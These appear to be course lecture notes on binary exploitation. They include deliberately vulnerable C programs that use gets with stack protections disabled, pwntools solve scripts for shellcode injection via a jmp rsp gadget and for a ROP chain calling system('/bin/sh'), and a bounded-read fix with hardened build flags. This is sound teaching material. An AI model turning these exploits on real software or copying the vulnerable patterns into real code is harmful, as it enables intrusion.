Binary Exploitation Techniques and Mitigations

Apr 28, 2025

Binary Exploitation: Shellcode, Mitigations, ROP

Cool Security People of the Day (CSPoD)

The BOF Strikes Back

  • Previous Topic: Buffer overflow and ret2win attack.
  • Challenges:
    • Buffer overflow on stack via gets.
    • Overwriting the return address of the stack frame.
  • Example Code (the deliberately vulnerable challenge binary):
        #include <stdio.h>
        #include <string.h>
        #include <stdlib.h>
        #include <unistd.h>   /* execve */

        void win() {
            printf("How did you get here? I don't know whether to hire or fire you...");
            execve("/bin/sh", 0, 0);
        }

        void main() {
            char buffer[32];
            setvbuf(stdout, NULL, _IONBF, 0);
            setvbuf(stderr, NULL, _IONBF, 0);
            printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? ");
            gets(buffer);   /* unbounded read into a 32-byte stack buffer */
            printf("Thanks, we received your input: %s\n", buffer);
        }

New Challenge

  • Without a win function (the only gadget is a jmp rsp inside stuff()):
        #include <stdio.h>
        #include <string.h>
        #include <stdlib.h>

        void stuff() {
            asm volatile ("jmp *%%rsp;" :::);   /* never called; exists only as a gadget */
        }

        void main() {
            char buffer[32];
            setvbuf(stdout, NULL, _IONBF, 0);
            setvbuf(stderr, NULL, _IONBF, 0);
            printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? ");
            gets(buffer);   /* unbounded read into a 32-byte stack buffer */
            printf("Thanks, we received your input: %s\n", buffer);
        }
  • Compilation Command (mitigations deliberately disabled): gcc pwnme.c -o pwnme -zexecstack -fno-stack-protector -no-pie

Shellcode

  • Goal: Inject assembly into the program for shell execution.
  • Gadgets:
    • Short instruction sequences already present in the binary that the exploit redirects control to after the overflow.
    • Use ropper to find gadgets.
    • Importance of finding writable and executable memory locations.
    • Jumping to stack with jmp rsp.

Shellcode Implementation

  • Tools: pwntools, shellstorm, and other one-off tools.
  • Example Solve Script:
        from pwn import *

        context.arch = "amd64"
        p = process("./pwnme")
        gdb.attach(p)   # attach a debugger to watch the jump

        # 40 bytes of padding reach the saved return address, which is replaced
        # with the jmp rsp gadget; execution then lands on the shellcode placed
        # directly after it on the stack.
        payload = b"Z" * 40 + p64(0x40117e) + asm(shellcraft.sh())
        p.sendline(payload)
        p.interactive()

Mitigations

  • Challenges with gets: it cannot be told the buffer size, so it has no safe use case, yet it remains widespread in C programs.
  • Compiler Warnings and Mitigations:
    • The build flags -zexecstack, -fno-stack-protector and -no-pie switch off protections (non-executable stack, stack canaries, PIE) that would otherwise stop or complicate the exploit above.
    • NX bit / W^X: a memory page may be writable or executable, never both, so shellcode written onto the stack cannot be run.
  • Real World Examples: Sudo utility vulnerabilities, D-Link router issues.
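Added example (not the course's code): a bounded replacement for the challenge's gets(buffer) that never writes past the 32-byte buffer and drains an over-long line instead of overflowing. The byte_src callback, string_byte and demo_truncation are assumptions introduced here so the same reader can be exercised on a constructed in-memory input; stdin_byte is the source the real program would use.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 32   /* same buffer size as the challenge */

/* Byte source: one reader serves stdin and, in the demo, an in-memory string. */
typedef int (*byte_src)(void *ctx);

/* Read one line into buf (capacity n), never writing past buf[n-1].
 * Returns bytes stored (excluding NUL) or -1 on immediate EOF. An
 * over-long line is truncated and the rest drained so leftover bytes
 * cannot be misread as the next answer. */
int read_answer(char *buf, size_t n, byte_src next, void *ctx) {
    size_t len = 0;
    int c = n ? next(ctx) : EOF;
    if (c == EOF)
        return -1;
    for (; c != EOF && c != '\n'; c = next(ctx)) {
        if (len + 1 < n)          /* keep room for the terminating NUL */
            buf[len++] = (char)c; /* else drop the byte, keep draining */
    }
    buf[len] = '\0';
    return (int)len;
}

int stdin_byte(void *ctx) { (void)ctx; return fgetc(stdin); } /* real program */

/* In-memory source for the demo: ctx is a pointer to a const char* cursor. */
int string_byte(void *ctx) {
    const char **cur = ctx;
    return **cur ? (unsigned char)*(*cur)++ : EOF;
}

/* Demo helper (hypothetical): run a constructed line through read_answer. */
int demo_truncation(const char *input, char *out, size_t n) {
    const char *cur = input;
    return read_answer(out, n, string_byte, &cur);
}

int main(void) {
    char buffer[BUF_SIZE];
    /* Constructed input: 100 'A's, the shape of the overflow payload. Only
     * 31 fit in the buffer; the saved return address is never touched. */
    char big[102];
    memset(big, 'A', 100);
    big[100] = '\n'; big[101] = '\0';
    int got = demo_truncation(big, buffer, sizeof buffer);
    printf("stored %d bytes: %s\n", got, buffer);
    return 0;
}
```

Build the real program with the protections the lecture's flags turn off, e.g. gcc -fstack-protector-strong -pie -fPIE -Wl,-z,noexecstack, so a remaining bug is caught rather than redirected.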

ROP (Return Oriented Programming)

  • Concept:
    • Utilize a sequence of gadgets.
    • Chain gadgets so that each ends in a ret (or jmp) that passes control to the next gadget address placed on the stack.
  • Calling Conventions: Registers used for function arguments.
  • GOT (Global Offset Table) and PLT (Procedure Linkage Table): Facilitate external library function calls.
  • Example ROP Solve Script:
        from pwn import *

        context.arch = "amd64"
        p = process("./pwnme2")

        pop_rdi = 0x401293                  # pop rdi; ret gadget (first-argument register)
        binsh = 0x404060                    # address of a "/bin/sh" string in the binary
        system_plt = 0x000000401070         # system@plt entry
        alignment_ret = 0x000000000040122d  # lone ret to keep the stack 16-byte aligned

        payload = (b"F" * 40 + p64(alignment_ret) + p64(pop_rdi) + p64(binsh) + p64(system_plt))
        p.sendline(payload)
        p.interactive()

Summary

  • Topics Covered: Shellcode injection, ROP techniques, exploitation mitigations.
  • Next Topics: Leaks, ASLR, and more binary exploitation techniques.